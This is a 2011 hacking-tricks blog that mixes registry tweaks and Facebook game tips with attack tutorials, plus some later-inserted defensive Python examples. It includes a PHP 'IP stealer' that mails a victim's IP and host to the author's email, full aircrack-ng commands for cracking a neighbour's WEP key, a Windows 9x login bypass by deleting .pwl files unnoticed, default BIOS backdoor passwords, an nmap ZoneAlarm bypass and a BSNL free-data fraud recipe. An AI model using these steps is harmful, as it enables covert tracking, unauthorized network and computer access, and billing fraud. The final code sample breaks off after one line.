Saturday, September 17, 2011

Trick to Disable Send To Option From Right Click Menu


You must have seen the Send To option when you right-click on any file or folder. It lets you send files and folders from one location (drive) to another, and it also acts as a shortcut for sending files to external storage media (pen drive, memory card). With this trick you can disable the feature by making a change in the Windows Registry. After that, anyone who wants to take data from your computer has to copy and paste it rather than use the Send To option.
Trick to Disable Send To option on Right Click in Context Menu:
  • Type Run in the Start menu search box and press Enter, or press Win+R.
  • Type Regedit and click OK.
  • Now navigate to the following location:
HKEY_CLASSES_ROOT\AllFilesystemObjects\shellex\ContextMenuHandlers\Send To
  • Double-click on Default in the right window pane.
  • You will see a hexadecimal value in the Value data field. Remove this value (make the field blank) and click OK.


That’s it! The Send To option will now be gone from the context menu when you right-click on any file or folder. You can restore the option by putting the hexadecimal value back in the Value data field, so it is better to copy that value and save it somewhere on your computer before you remove it.



Thursday, September 15, 2011

Facebook FishVille Cheat


So what is FishVille? It’s a game where you raise fish, feed them and help decorate the tank they live in. It’s similar to many other games like FarmVille, Cafe World, and Roller Coaster Kingdom, but in this one you are simply taking care of a fish tank. As you raise fish you can sell them to earn coins and experience. Honestly, it uses a similar format to all of Zynga’s other games, which means the company could reuse a lot of the code from their other games.

Before giving out a tip or two, what is Fishville? Fishville is the latest Facebook game from Zynga! After the smashing success of Farmville, a game where you create and maintain a farm, Zynga has introduced another game which has a lot of potential of being another winner.
Some say that this game is like an underwater Farmville. But in my opinion, this game is more like Tamagotchi (remember the small pocket-size gadget kids of the 90s were crazy about?), where you need to make sure you feed your fish every now and then.


In this game you simply grow fish, feed them, and then purchase items for your fish tank. Then come back once in a while to see how your tank is doing. Just like all the other games on Facebook, this one is passive so that you can check in a couple times a day rather than sit and play it non-stop. While I haven’t spent a lot of time playing this game, I’m sure that Zynga is actively tracking user metrics to ensure that this game is just as sticky as their other ones.

Now on to some tips. In Farmville, if you do not harvest your crops in time, they will wither and die. The same is true in Fishville: if you do not feed your fish, they will die. You need to know when each fish has to be fed. Some take hours before they need feeding and some take only minutes. If you have fish that need feeding every few minutes, you need to be vigilant in feeding them or else they die, which happened to me a lot of times.

If it turns out to be a hit (which it probably will be),  Zynga should blow past 200 million monthly active users, far outstripping any of the other competition on the Facebook Platform. If you want to spend your time building a virtual fish tank, go check out FishVille. Also check out Inside Social Games who first broke the news of this application.

Another good tip would be to find neighbors as soon as possible. Like Farmville, you need them to unlock some items. I haven’t fully played Fishville yet but I am sure that your neighbors can help you take care of your fish like how you can take care of your neighbor’s farm in Farmville.

Thursday, September 8, 2011

Bypassing Firewalls

Although firewalls are meant to provide complete protection from port-scan probes and the like, several popular firewall products contain holes just waiting to be exploited. This section focuses on a hole in ZoneAlarm, Versions 2.1.10 to 2.0.26, that allows attackers to port-scan the target system. Specifically, if a TCP or UDP scan uses port 67 as its source port, ZoneAlarm will let the packets through and will not notify you. That means an attacker can TCP or UDP port-scan a ZoneAlarm-protected computer as if there were no firewall, if he or she uses port 67 as the source port on the packets.

For example, in the case of a UDP scan, an attacker can use nmap to port scan the host with the following command line (notice -g67, which specifies the source port):

nmap -g67 -P0 -p130-140 -sU 192.168.128.88

After you have installed a firewall on your system, you may get a number of warnings, seemingly indicating that someone is trying to break into your system. In most cases, however, they are in fact bogus messages that are caused either by your OS or by the process of allocating dynamic IPs. For example, when you dial in to your ISP, you may receive a message that a certain IP is probing a particular port on your system. This is because someone disconnected from your ISP just before you dialed in and you were assigned that person's IP address. What you are seeing are the remains of the ISP's communication with the previous user. This is most common when the person to whom the IP was previously assigned was using ICQ or a chat program, was connected to a game server, or had simply turned off his modem before his communication with remote servers was complete.

Another common message is that a certain IP is trying to initiate a NetBIOS session on a particular port on your system (in fact, NetBIOS requests to UDP port 137 are among the most common items you'll see in your firewall reject logs). This stems from a feature in Windows: when a program resolves an IP address to a name, it may send a NetBIOS query to an IP address. This process is just part of the background radiation of the Internet and is nothing to be concerned about.

Likewise, for a TCP scan, an attacker can use nmap to port-scan the host with the following command line (again, notice -g67, specifying the source port):

nmap -g67 -P0 -p130-140 -sS 192.168.128.88
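
For the defender, the useful check is that traffic from source port 67 is only legitimate as a DHCP/BOOTP reply (UDP, destination port 68). The following is an added example, not part of the original post: it scans firewall log lines for source-port-67 packets that are anything else. The log format, timestamps and all addresses except 192.168.128.88 are constructed for the illustration.

```python
import re
from collections import defaultdict

# Constructed sample in a hypothetical firewall log format (not ZoneAlarm's own).
SAMPLE_LOG = """\
2011-09-08T10:00:01 IN proto=UDP src=192.168.128.1:67 dst=192.168.128.88:68 action=ALLOW
2011-09-08T10:00:05 IN proto=UDP src=192.168.128.50:67 dst=192.168.128.88:130 action=ALLOW
2011-09-08T10:00:05 IN proto=UDP src=192.168.128.50:67 dst=192.168.128.88:131 action=ALLOW
2011-09-08T10:00:06 IN proto=UDP src=192.168.128.50:67 dst=192.168.128.88:137 action=ALLOW
2011-09-08T10:00:09 IN proto=TCP src=192.168.128.50:67 dst=192.168.128.88:135 action=ALLOW
2011-09-08T10:00:09 IN proto=TCP src=192.168.128.50:67 dst=192.168.128.88:139 action=ALLOW
2011-09-08T10:00:12 IN proto=UDP src=192.168.128.77:1029 dst=192.168.128.88:137 action=DENY
2011-09-08T10:00:15 IN proto=TCP src=192.168.128.60:67 dst=192.168.128.88:68 action=ALLOW
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) IN proto=(?P<proto>TCP|UDP) "
    r"src=(?P<src>[\d.]+):(?P<sport>\d+) "
    r"dst=(?P<dst>[\d.]+):(?P<dport>\d+) action=(?P<action>\w+)$"
)

BOOTP_SERVER_PORT = 67   # DHCP/BOOTP server side, UDP only
BOOTP_CLIENT_PORT = 68   # DHCP/BOOTP client side, UDP only


def parse_log(text):
    """Turn log text into a list of packet dicts; unparseable lines are skipped."""
    packets = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m is None:
            continue
        pkt = m.groupdict()
        pkt["sport"] = int(pkt["sport"])
        pkt["dport"] = int(pkt["dport"])
        packets.append(pkt)
    return packets


def is_dhcp_reply(pkt):
    """The only inbound traffic that should be trusted because of source port 67."""
    return (pkt["proto"] == "UDP"
            and pkt["sport"] == BOOTP_SERVER_PORT
            and pkt["dport"] == BOOTP_CLIENT_PORT)


def find_source_port_abuse(text):
    """Map each sender to the (proto, dst port) pairs it reached from source port 67
    that are not DHCP replies. TCP from port 67 is always reported: DHCP is UDP."""
    hits = defaultdict(set)
    for pkt in parse_log(text):
        if pkt["sport"] == BOOTP_SERVER_PORT and not is_dhcp_reply(pkt):
            hits[pkt["src"]].add((pkt["proto"], pkt["dport"]))
    return {src: sorted(ports) for src, ports in hits.items()}


def count_passed(text):
    """How many of the suspicious packets the firewall actually let through."""
    return sum(1 for pkt in parse_log(text)
               if pkt["sport"] == BOOTP_SERVER_PORT
               and not is_dhcp_reply(pkt)
               and pkt["action"] == "ALLOW")


if __name__ == "__main__":
    for src, ports in find_source_port_abuse(SAMPLE_LOG).items():
        print(src, ports)
    print("passed by firewall:", count_passed(SAMPLE_LOG))
```

The same predicate is what a corrected filter rule should express: trust source port 67 only for UDP packets addressed to port 68, and apply the normal policy to everything else.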



(By Dushyant Pandya)





Monday, August 15, 2011

What are TCP Wrappers?

TCP wrappers enable you to define a set of rules, called access control rules, that define which systems are allowed to access and use the services running on the local machine (that is, the machine on which the TCP wrappers are installed and configured) and which systems are denied access to these services. In addition, TCP wrappers enable you to log which client is using which service at what time, and even for what purpose. The best thing about TCP wrappers, however, is that they can be used to set booby traps for script kiddies. Before you can understand how TCP wrappers work, however, you must understand how Linux machines respond to connection requests.

All requests for connections received by a Linux box are transferred to the Internet daemon, or the inetd. The inetd is the main daemon on a Linux machine, and it receives all connection requests on behalf of all services or daemons running on all port numbers on that machine.

When the inetd receives a connection request, it uses two configuration files to determine what to do next:

  • /etc/services. This file contains the names of the various services on the Linux box and the corresponding port numbers on which these services run. It is used by the inetd to figure out what service runs on what port number.
  • /etc/inetd.conf. This file contains the names of the various services on the Linux box and the corresponding daemons or programs providing those services. It is used by inetd to figure out which program or daemon to call on when there is a request for a connection to a particular service.


Both these files work together and are interlinked.

So you can grasp how the inetd uses these two files to allow remote connections to take place, let's use an example. Suppose a client, X, wants to connect to a server, Y. Here's what happens:

  1. X sends Y a packet containing the port number to which it wants to connect (in this case, 23, or the telnet port) and other information required to initiate a TCP connection.
  2. In response, the inetd at Y searches the /etc/services file for the name of the service running on port 23 (telnet). inetd then consults the /etc/inetd.conf file for the name of the daemon or program that runs the telnet service (in this case, in.telnetd).
  3. Finally, inetd runs in.telnetd, concluding its role in that particular connection, and starts listening for other connection requests.
This demonstrates that a remote system does not start out by communicating directly with the various daemons, but instead communicates at first only with the inetd.

How, then, can you restrict certain clients from accessing your system while allowing others in? This is where TCP wrappers come in. A TCP wrapper acts as a daemon that resides between a Linux system's inetd and other programs or daemons on that system, such as in.ftpd, in.telnetd, and so on. Instead of calling programs in a system directly, as in step 3 of the preceding numbered list, inetd calls the TCP wrapper. The wrapper collects the source IP from the packet and accordingly allows or denies the connection, depending on the rules defined in the TCP wrapper. Irrespective of whether the connection is allowed or denied, the wrapper logs the connection request.
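
The lookup chain and the wrapper's decision can be followed end to end in a small model. This is an added example, not part of the original post: the file contents are constructed samples, the rule syntax follows the usual hosts.allow / hosts.deny layout (daemon list, colon, client list), and only the ALL keyword, exact addresses and address prefixes ending in a dot are handled.

```python
# Constructed sample of /etc/services: service name, port/protocol.
SERVICES = """\
ftp     21/tcp
telnet  23/tcp
"""

# Constructed sample of /etc/inetd.conf. The server program is the wrapper
# (tcpd); the real daemon name is passed as its argument.
INETD_CONF = """\
ftp    stream tcp nowait root /usr/sbin/tcpd in.ftpd
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
"""

# Constructed access control rules: allow list is checked first, then deny list.
HOSTS_ALLOW = """\
in.telnetd : 192.168.1.
in.ftpd    : 192.168.1.10
"""
HOSTS_DENY = "ALL : ALL\n"


def _lines(text):
    """Yield non-empty lines with '#' comments removed."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            yield line


def parse_services(text):
    """Map (port, protocol) to service name, as inetd does with /etc/services."""
    table = {}
    for line in _lines(text):
        name, port_proto = line.split()[:2]
        port, proto = port_proto.split("/")
        table[(int(port), proto)] = name
    return table


def parse_inetd_conf(text):
    """Map service name to the program inetd starts and its arguments."""
    table = {}
    for line in _lines(text):
        fields = line.split()
        table[fields[0]] = {"server": fields[5], "args": fields[6:]}
    return table


def parse_rules(text):
    """Return a list of (daemon patterns, client patterns) pairs."""
    rules = []
    for line in _lines(text):
        daemons, clients = line.split(":", 1)
        rules.append((daemons.replace(",", " ").split(),
                      clients.replace(",", " ").split()))
    return rules


def _match(pattern, value):
    if pattern == "ALL":
        return True
    if pattern.endswith("."):          # address prefix such as "192.168.1."
        return value.startswith(pattern)
    return pattern == value


def rules_match(rules, daemon, client_ip):
    return any(any(_match(d, daemon) for d in daemons)
               and any(_match(c, client_ip) for c in clients)
               for daemons, clients in rules)


def wrapper_decision(daemon, client_ip):
    """Allow list wins, then deny list, and no match at all means allow."""
    if rules_match(parse_rules(HOSTS_ALLOW), daemon, client_ip):
        return "allow"
    if rules_match(parse_rules(HOSTS_DENY), daemon, client_ip):
        return "deny"
    return "allow"


def handle_connection(port, client_ip, log):
    """Steps 1-3 from the text, with the wrapper in place of the direct call."""
    service = parse_services(SERVICES)[(port, "tcp")]
    entry = parse_inetd_conf(INETD_CONF)[service]
    daemon = entry["args"][0]
    verdict = wrapper_decision(daemon, client_ip)
    # The wrapper logs the request whether it is allowed or denied.
    what = "connect" if verdict == "allow" else "refused connect"
    log.append(f"{daemon}: {what} from {client_ip}")
    return verdict, daemon


if __name__ == "__main__":
    log = []
    print(handle_connection(23, "192.168.1.57", log))
    print(handle_connection(23, "10.0.0.9", log))
    print("\n".join(log))
```

Because an unmatched client is allowed by default, the catch-all deny rule is what turns the allow list into an actual restriction.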















Tuesday, August 9, 2011

Free Proxy Servers and Hide Your IP

I have collected a lot of proxy server URLs and created a proxy server list. Use any of these to hide your IP address.








please comment below if this post is useful for you..
:)

Friday, August 5, 2011

Hide EXE File into JPG

Thursday, July 28, 2011

BSNL 3G Hack! Browse Internet For Free

Today I am going to show how to hack BSNL 3G and browse unlimited internet at high speed, up to 120 Kbps. I am not sure whether this hack is still working or not; members from other forums are posting that this hack is working fine for them.


Before you start learning how to hack you need to have BSNL 2G SIM and ultimately 3G support mobile phone.

Just follow up the instruction:
  1. Recharge your 2G SIM with Rs 1 to convert it to a 3G SIM and use them for free hours.
  2. Check the balance by dialing *123#; the message will show that your GPRS free usage is ZERO MB.
  3. Now recharge again with Rs 1 to convert it into a 2G SIM.
  4. Now recharge with Rs 274 for unlimited GPRS usage for 2G SIM.
  5. Now again recharge with Rs 1 to convert it into a 3G SIM.
  6. That's it! You have hacked your BSNL 3G for unlimited browsing. Check the GPRS free usage by dialing *123#; it will show 1250000 MB free usage.

Monday, July 18, 2011

Chat With Command Prompt

If you want a private chat with a friend or client on your network, you don't need to download any fancy program!
All you need is your friend's IP address and Command Prompt.
First, open Notepad and enter:

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:

MESSENGER
User:

After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.
Before you press "Enter" it should look like this:

MESSENGER
User: xx.xxx.xxx.xxx
Message: Hi

Now all you need to do is press "Enter", and start chatting!

Friday, July 15, 2011

PHP IP Stealer

$ip = $REMOTE_ADDR;
$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "dushpandya2001@hotmail.com";
$sujet = "Ip + Host";
$message = "
Ip : $ip
Host : $host";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo "Ownneeed";}
else { echo "Shit ?";}
?>

Replace dushpandya2001@hotmail.com with your mail address, make a doc.php, give it to your friend, and you will receive his IP and host in your inbox.

Tuesday, June 28, 2011

Crack a Wi-Fi Network’s WEP Password

Today we're going to run down, step-by-step, how to crack a Wi-Fi network with WEP security turned on. But first, a word: Knowledge is power, but power doesn't mean you should be a jerk, or do anything illegal. Knowing how to pick a lock doesn't make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise.

What You'll Need

Unless you're a computer security and networking ninja, chances are you don't have all the tools on hand to get this job done. Here's what you'll need:

  • A compatible wireless adapter. This is the biggest requirement. You'll need a wireless adapter that's capable of packet injection, and chances are the one in your computer is not. After consulting with my friendly neighborhood security expert, I purchased an Alfa AWUS050NH USB adapter.
  • A BackTrack 3 Live CD. Download yourself a copy of the CD and burn it, or load it up in VMware to get started. (I tried the BackTrack 4 pre-release, and it didn't work as well as BT3. Do yourself a favor and stick with BackTrack 3 for now.)
  • A nearby WEP-enabled Wi-Fi network. The signal should be strong and ideally people are using it, connecting and disconnecting their devices from it. The more use it gets while you collect the data you need to run your crack, the better your chances of success.
  • Patience with the command line. This is a ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.

Crack That WEP

To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the taskbar in the lower left corner, second button to the right. Now, the commands.
First run the following to get a list of your network interfaces:
airmon-ng
The only one I've got there is labeled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface).
Now, run the following four commands.

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)


Now it's time to pick your network. Run:
airodump-ng (interface)
This shows a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labeled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC column), not WPA or anything else.



Now we're going to watch what's going on with that network you chose and capture that information to a file. Run:
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). 


Open a new Konsole window in the foreground, and enter this command:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

Here the ESSID is the access point's SSID name. What you want to get after this command is the reassuring "Association successful" message with that smiley face.

You're almost there. Now it's time for:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Here we're creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets.  Here's the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack.

Depending on the power of your network  this process could take some time. Wait until that #Data goes over 10k, though—because the crack won't work if it doesn't. In fact, you may need more than 10k, though that seems to be a working threshold for many.

Once you've collected enough data, it's the moment of truth. Launch a third Konsole window and run the following to crack that data you've collected:
aircrack-ng -b (bssid) (file name-01.cap)

Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it's the one with .cap as the extension.
If you didn't get enough data, aircrack will fail and tell you to try again with more.
The WEP key appears next to "KEY FOUND." Drop the colons and enter it to log onto the network.






 

 



Saturday, June 25, 2011

Appear Invisible on Facebook

To start with, once you login to your Facebook account, click on the Friends link on the left panel.
There you will find an option to Edit your friends. Just click on that link. Now, you would be required to create a list just by clicking on Create List. And once you create a list, add as many friends to it as you want.
The reason behind creating this list is that it lets you make yourself invisible to the whole list at once. Now, click on your Facebook Chat box. There, you will be able to find that newly created list. You can make yourself invisible to that list by clicking on the green button labelled Go Offline.
This is as simple as that. This is how you can stay invisible on Facebook Chat.

Tuesday, June 21, 2011

Multiple Yahoo Messenger in One PC !! :)


For people who manage multiple accounts at the same time (yes I mean you – the one with a separate account for your work stuff, family stuff and naughty stuff), the time has come for you to use ALL your accounts at the same time!


Behold the simplest method that you can use to enable you to log-in simultaneously with your multiple yahoo accounts! See the video I have attached or follow the simple hack that needs 5 steps.



  1. Click on Start Menu
  2. Click Run
  3. Type “regedit” without the quotes, press Enter
  4. Navigate to and expand the following in the said order: HKEY_CURRENT_USER\Software\Yahoo\pager\Test
  5. Right-click on Test and create a new DWORD value (32 bit).
  6. Rename that value as “Plural” without the quotes.
  7. Set the value of “Plural” to 1.
It's done!!
Now close the registry editor, restart Yahoo Messenger and try Multiple Login :)

Sunday, June 19, 2011

SQL Injection Attacks

These attacks occur when the hacker uses specially crafted SQL queries or commands to execute malicious activities on the victim system. This weakness exists when there is no validation of input when a database query is made via the Internet. The worst thing is that SQL attacks, like most other input validation attacks, can be executed easily through a browser. Most Web sites on the Net rely heavily on the safety of their online database information. Naturally, any breach in their security would lead to damage in the form of financial loss, customer dissatisfaction, possible lawsuits and so on.

Obviously, the first step for a SQL injection attack is to find a vulnerable target. Attackers would be on the alert for online forms, such as login prompts, search enquiries, guest books, feedback forms, and so on, through which users submit data to the remote system. Another potential target would be any reference to dynamic pages or scripts, like ASP, PHP, CGI, and their like. The following HTML code is a vulnerable target for a SQL injection attack because it lets the user submit information and also refers to an ASP file:
<form action="script/login.asp" method="post" name="LoginForm">
<input type="text" name="username" value="username">
<input type="password" name="password" value="password">
</form>

Uncovering illegitimate records, bypassing security features and carrying out malicious code on the remote victim system are all possible for an attacker who has located a vulnerable SQL server. The most common examples of SQL injection attacks are examined in the following sections. It should always be kept in mind, however, that there are a larger number of such attacks.
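
What "no validation of input" means on the server side of such a login form, as an added example that is not part of the original post: Python with sqlite3 stands in for the ASP script, and the table layout, user names and passwords are constructed. A harmless name containing an apostrophe is enough to show that pasted-in input becomes part of the SQL text, while a bound parameter stays data.

```python
import hashlib
import hmac
import os
import sqlite3


def _hash(password, salt):
    """Salted, slow password hash so the table never holds plain passwords."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    """In-memory database with two constructed accounts."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)"
    )
    for name, pw in [("alice", "correct horse"), ("o'brien", "battery staple")]:
        salt = os.urandom(16)
        db.execute("INSERT INTO users VALUES (?, ?, ?)",
                   (name, salt, _hash(pw, salt)))
    return db


def lookup_concatenated(db, username):
    """The weak pattern: form input is pasted straight into the SQL text,
    so any quote character in it changes the structure of the query."""
    sql = "SELECT salt, pw_hash FROM users WHERE username = '" + username + "'"
    return db.execute(sql).fetchone()


def lookup_parameterized(db, username):
    """The corrected pattern: the driver binds the value, it is never parsed as SQL."""
    return db.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()


def login(db, username, password):
    """Validate the input, look the user up with a bound parameter,
    then compare hashes in constant time."""
    if not (0 < len(username) <= 64) or not (0 < len(password) <= 128):
        return False
    row = lookup_parameterized(db, username)
    if row is None:
        return False
    salt, pw_hash = row
    return hmac.compare_digest(_hash(password, salt), pw_hash)


def input_alters_query(db, username):
    """True when the concatenated query no longer parses as the intended
    statement, i.e. the input was interpreted as SQL rather than as a value."""
    try:
        lookup_concatenated(db, username)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("o'brien logs in (parameterized):",
          login(db, "o'brien", "battery staple"))
    print("o'brien alters concatenated query:",
          input_alters_query(db, "o'brien"))
```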

Friday, June 17, 2011

What is an IP address?

In the real world, everyone has an individual home address or telephone number to enable easy access. Similarly, all computers connected to the Internet are given a unique Internet Protocol or IP address that can be used to contact that particular computer. In geek language, an IP address is a decimal notation that divides a 32-bit Internet address into four 8-bit fields.

  

Tuesday, June 14, 2011

IP Spoofing

IP Spoofing is probably the ultimate trick or attack that an attacker can execute on the target system. Almost all wannabe computer experts dream of being able to spoof their IP address and fool the target system into establishing illegitimate connections. If successfully executed, IP spoofing is definitely one of the most smooth and classic attacks on the Internet. However, IP spoofing attacks are quite complex and very few attackers have actually been able to spoof their identity successfully. IP Spoofing is a process wherein an attacker fools or tricks the target system into believing that the data packets being sent actually originated on a system other than the real source system. In other words, IP spoofing is a technique that allows an attacker to change or disguise his real identity while communicating with the target system. In this technique, the data packets that the attacker sends to the system will seem to originate at some other arbitrary system.

Sunday, June 12, 2011

Dictionary Attacks(Password Cracking Attack)

Dictionary attacks are an example of a hit and trial password-cracking technique that is commonly used by attackers. In this password-cracking technique, the attacker uses an automatic tool that tries all words that appear in the dictionary as the victim's password. As soon as a particular word matches the victim's password, the automated tool displays it on the screen. In other words, all dictionary words are tried as the password and if a word matches, it is then displayed on the screen as the password of the victim. One of the biggest problems with this type of attack is that it takes up a lot of system resources and is relatively slow. Moreover, this password-cracking technique is rendered useless if the victim's password is not a word that appears in the dictionary.

Friday, June 10, 2011

Locking CD-ROM Drives

(For Windows 2000, XP and NT)
Similar to the above example, it is also possible to lock access to the CD-ROM drive by the following steps:
  1. Open the regedit.exe file.
  2. Search for the following registry key:
     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
  3. Create a new string entry named AllocateCDRoms and set its data value to 1 to ensure that only the local logged-on user can access the CD-ROM drive. On the other hand, if the string entry's data value is set to 0 then all restrictions are lifted.
  4. Exit the Windows registry. You might have to restart the Windows session for the changes to come into effect.

It is also possible to implement the above by simply creating and executing a file with a .reg extension containing the following data:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AllocateCDRoms"="1"




Sunday, May 29, 2011

Distributed DOS Attacks

DOS attacks are not new; in fact they have been around for a long time. However, there has been a recent wave of Distributed Denial of Service attacks, which pose a great threat to security and are on the verge of overtaking Viruses/Trojans to become the deadliest threat to Internet security.

In a distributed DOS Attack, a group of say, five hackers join and decide to bring a Fortune 500 company's server down. Now, each one of them breaks into a smaller less-protected network and takes control. So, now they have five networks and supposing there are around 20 systems in each network, it gives these hackers, around 100 systems in all to attack from. They now connect to the network, install a Denial of Service tool on the hacked networks and using these hacked systems launch attacks on the Fortune 500 company. This makes the hackers less easy to detect and helps them do what they wanted to do without getting caught. As they have full control over the smaller less-protected networks, they can easily remove all traces before the authorities get there.

Friday, May 27, 2011

Hack Windows Login Password

To hack the Windows login password, reboot and wait for the message:
"Starting Windows 9x..."

When you see this on the screen, press F8. The boot menu will come up. Select option 7, to boot into DOS. Then go to the Windows directory by typing:

C:\>cd windows

Then, rename all files with the extension .pwl by typing the following command:

C:\windows>ren *.pwl *.xyz
or, delete them by typing
C:\windows>del *.pwl

Now, when the Windows password login pops up, you can write anything in the place where the password has to be typed. As you have renamed (or deleted, although renaming them would be better as the victim will not know that his PC has been tampered with) the password files, Windows cannot find them, so when you enter a password, Windows just takes it as the original password.


 

Tuesday, May 24, 2011

BIOS Passwords

The BIOS holds the basic settings of your computer, such as how many and what kinds of disk drives you have, which ones are enabled and which are disabled and which ones are used for booting. These settings are held in a CMOS chip on the motherboard. A tiny battery keeps this chip always running so that whenever you turn your computer off, it still remembers its instructions.

A common method of entering the BIOS is pressing the Del key at boot up. Other common methods are pressing the keys Ctrl + Alt + Esc or only Ctrl + Esc. Most computers have a BIOS which can be configured to ask for a password as soon as the computer is switched on. If the Ask Password option is enabled, then as soon as the PC is switched on, a dialog box welcomes you and asks you for the password. You cannot override this and there is no way of disabling this because to enter the BIOS you need to know the BIOS password. So, what do you do? Disable it by hacking into the BIOS Setup. But there's a catch. To disable the BIOS password, you need to enter the BIOS. But as soon as you enter the BIOS, the BIOS asks for a password. The most common method of overriding this password prompt is by trying out some default BIOS passwords:

lkwpeter   AMI     cmos
j262       Award   AMI!SW1
AWARD_SW   bios    AMI?SW1
AWARD_PW   BIOS    password
Biostar    setup   hewittrand

(Note: Complete list of BIOS passwords)

'j262' opens most versions of Award BIOS; it works about 80 percent of the time. 'AWARD_SW' and 'AWARD_PW' work on some computers as well, but less often. In some BIOS, shift + s y x z also works.

The Company name and version of the BIOS  is displayed on the screen each time the system boots.

If the default passwords did not work, then get ready for some serious hacking. Try to reset the BIOS to its default settings so that it asks for no password at all. Do the following:

First, you have to open the computer and then look for a round lithium battery; it probably looks like a silver coin. Remove the battery and after 30 seconds or so put it back. Some computers may also require you to reset the jumper, so look for a 3-pin jumper and reset it. For example, on most machines you will find a three-pins two and three and leave it there for over five seconds, it will reset the CMOS.

When you boot the machine, some BIOS may give an error saying that the BIOS was reset or tampered with, but that is not such a big problem.

CAUTION: Messing with the CMOS chip and the jumper is more dangerous than editing system files. So, do everything with utmost caution.





Monday, May 23, 2011

What is a password?

Passwords are one of the oldest forms of authentication mechanism being used on systems across the world. Password prompts, where one is asked to enter the correct username-password pair, are what prevent infiltration and ensure privacy. Every computer criminal aspires to be able to go past the password prompt and gain illegal access to sensitive data for malicious purposes. Even the data on Windows systems is protected through the password protection mechanism.

As soon as one boots a Windows system, one is greeted by a welcome password prompt, which on most systems can, unfortunately, be bypassed simply by clicking on the Cancel button. Even after the Windows session has begun, it is possible for a user to enforce password protection on specific files, folders or drives. In other words, passwords have also become one of the most commonly used authentication mechanisms on systems worldwide. It would be safe to say that passwords are the most important security mechanisms ever deployed.
   
Unfortunately, most people continue to treat passwords as a set of random and useless characters. It is also becoming increasingly easy for computer criminals to break password protection mechanisms using sophisticated tools and algorithms. Moreover, the most common passwords continue to be a blank or the same as the username. Once an attacker finds out the victim's password, there is an endless number of malicious activities that can be carried out. Hence, it has become very important for Windows users to take basic precautions to improve the overall security of the system. In this section we discuss some of the most common tips and tricks related to passwords and authentication that every Windows user must know.

Warning: It is always a good idea to back up all system files involved to avoid any accidental damage.












Saturday, May 21, 2011

UDP-flood attack

A UDP-flood attack typically exploits the target system's chargen or echo services to create an infinite loop between two or more UDP services. CERT describes UDP-flood attacks as follows:

When a connection is established between two UDP services, each of which produces output, these two services can produce a very high number of packets that can lead to a denial of service on the machine(s) where the services are offered. Anyone with network connectivity can launch an attack; no account access is needed.

For example, by connecting a host's chargen service to the echo service on the same or another machine, all affected machines may be effectively taken out of service because of the excessively high number of packets produced. In addition, if two or more hosts are so connected, the intervening network may also become congested and deny service to all hosts whose traffic traverses that network.


Countermeasure : To counteract a UDP-flood attack, it's a good idea to disable the chargen and echo services unless and until you really need them. In addition, try to disable as many other UDP services (which are not really important) as possible.

Wednesday, May 18, 2011

Smurf Attacks

A smurf attack is a sort of brute-force DOS attack in which a huge number of ping requests containing spoofed source IP addresses from within the target network is sent to a system (normally the router) within that network. When the router gets a ping, or echo request message, it sends an echo reply message to the spoofed IP address, flooding the network with packets, thereby clogging the network and preventing legitimate users from obtaining network services.

Detecting a SYN-Flood Attack

After the target system has tried to send a SYN/ACK packet to the client, and while it is waiting to receive an ACK packet, the existing connection is said to be half open, or the host is said to be in the SYN_RECEIVED state. If your system is in this state, it may well be experiencing a SYN-flood attack. To determine whether connections on your system are half open, type the netstat command; the parameters passed and the results displayed will vary from system to system. Here's an example:

C:\windows>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant *:* ESTABLISHED

In this example, several connections are cited as being in the SYN_RECEIVED state, most likely indicating that this system is under a SYN-flood attack. Note, however, that the preceding output also contains connections cited as being in the ESTABLISHED state; these are legitimate connections, which remain unaffected even after the SYN-flood attack on the target system. 
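The check described above can be automated. The following is an added example, not code from the original post: it assumes `netstat -an` style output (numeric addresses with ports), and the function names and the two thresholds are illustrative assumptions.

```python
from collections import Counter

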